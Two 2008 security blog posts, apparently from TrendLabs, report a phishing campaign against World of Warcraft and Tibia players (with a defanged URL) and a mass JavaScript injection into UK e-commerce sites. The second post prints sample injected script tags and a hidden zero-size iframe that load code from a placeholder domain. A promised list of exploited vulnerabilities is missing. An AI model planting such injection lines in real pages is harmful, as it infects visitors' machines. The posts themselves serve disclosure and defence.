January 14th, 2008 by Bernadette Irinco (Technical Communications)
Phishers tread the lands of MMORPGs World of Warcraft and Tibia reports the TrendLabs Content Security team. A sample of the phishing email that arrives at inboxes is shown below:
It asks users to click a link where they are redirected to a page that asks for their account name and password. The phishers made no attempt to hide the actual phishing URL hxxp://jungkyukimphoto.com/bgm/…/ and even displays it on the address bar. Trend Micro has already blocked access to the site.
The trend that pushed the proliferation of numerous Trojan spyware attempting to steal online game accounts and passwords is catching on in the phishing arena. The real profit generated by this virtual worlds are just too powerful lures.
January 14th, 2008 by Carolyn Guevarra (Technical Communications)
TrendLabs received reports of a massive attack against legitimate e-commerce Web sites, particularly in the U.K., with one or two references to Dubai, UAE. These Web sites are injected with the following malicious JavaScript code, which takes advantage of several vulnerabilities to infiltrate an unsuspecting user’s system:
<script language=’JavaScript’ type=’text/javascript’ src=’{random name}.js’></script>
The random file name of the said JavaScript brings difficulty in searching for more compromised pages. Add to that the fact that said JavaScript is hosted in the compromised domain itself.
This routine is unlike other compromises where Web sites are usually injected with either a malicious iFrame link or found to host a JavaScript in _other_ domains usually created and registered solely to host the malicious code or payload for these types of threats. For example:
<script language=’JavaScript’ type=’text/javascript’ src=’http://otherdomain/maliciousscript.js’></script>
or
<iframe src=http://otherdomain/maliciouspage.html width=0 height=0></iframe>
The following are some of the known vulnerabilities that this JavaScript exploits:
However, this is not the case here. Security researchers are still baffled by this event.
Users infected with this malicious JavaScript ultimately download a malicious .MOV file and Trojan programs onto their computers. Trend Micro detects the malicious JavaScript as JS_IESLICE.AQ and the malicious .MOV file as a variant of XML_HACK. The downloaded Trojan programs are detected as TROJ_DROPPER.NH and TROJ_AGENT.HJS.
As we know, motivation behind cyberattacks nowadays is always driven by money. This is just a first in a long series of e-commerce-related invasions that will occur in 2008, if companies and users don’t take extra measures in securing their online businesses. Keep your software updated and be extra vigilant in doing business online… It’s still not too late to add another resolution for ‘08.
Trend Micro Research Project Manager Ivan Macalintal says that this compromise is still under investigation. He adds: “Updates will be posted as soon as new information arrives so you better stay tuned!”
Many thanks to Mary Landesman of ScanSafe for providing the initial report on the topic
